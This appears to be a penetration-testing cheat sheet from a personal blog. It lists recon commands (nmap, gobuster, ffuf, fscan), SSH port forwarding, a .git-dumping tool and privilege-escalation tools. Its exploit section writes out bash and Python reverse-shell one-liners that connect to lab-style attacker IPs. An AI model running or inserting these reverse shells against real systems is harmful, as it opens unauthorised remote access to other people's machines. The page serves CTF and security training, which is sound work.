Recon
Scan
Nmap
1
| nmap -sV -sC --min-rate=1000 -p- <IP> -o nmap
|
Gobuster
1
2
3
4
| Dirsearch
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <IP/DNS>
Break status code
gobuster dir -w /usr/share/wordlists/dirb/common.txt -u <IP/DNS> -b <BREAK_STATUSCODE>
|
ffuf
1
2
| Subdomain search
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H “Host: FUZZ.site.com” -u http://site.com
|
fscan
Scan host in network Shadow1ng/fscan (github.com)
1
| ./fscan -h 172.0.0.1/24
|
Zeek with pcap
However password in zeek is to config for zeek to show in [Ippsec-Cap](https://www.youtube.com/watch?v=O_z6o2xuvlw)
SSH Port Forwarding
1
| ssh -L <PORT IN LOCAL>:<IP>:<PORT IN SERVER> username@<IP SERVER>
|
Exploit
Bash reverse shell
1
| bash -c 'bash -i >& /dev/tcp/10.10.14.14/9001 0>&1'
|
Python reverse shell
1
| python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.30",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
|
Stable reverse shell
1
| python3 -c 'import pty; pty.spawn("/bin/bash")'
|
GitHack - Exploit .git
lijiejie/GitHack: Khai thác tiết lộ thư mục .git (github.com)
1
2
| Githack
python GitHack.py http://site.htb/.git/
|
Hash Identifier
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| hash-identifier
┌──(kali㉿kali)-[~/TCM/TCM03_Academy]
└─$ hash-identifier
/usr/share/hash-identifier/hash-id.py:13: SyntaxWarning: invalid escape sequence '\ '
logo=''' #########################################################################
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH:
|
Privilege Escalation
Check sudo file permissions
- linpeas
- pspy - https://github.com/DominicBreuker/pspy - Show all process run in linux
Reverse shell
1
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
|
C# and .NET
If you find my articles interesting, you can buy me a coffee
![]()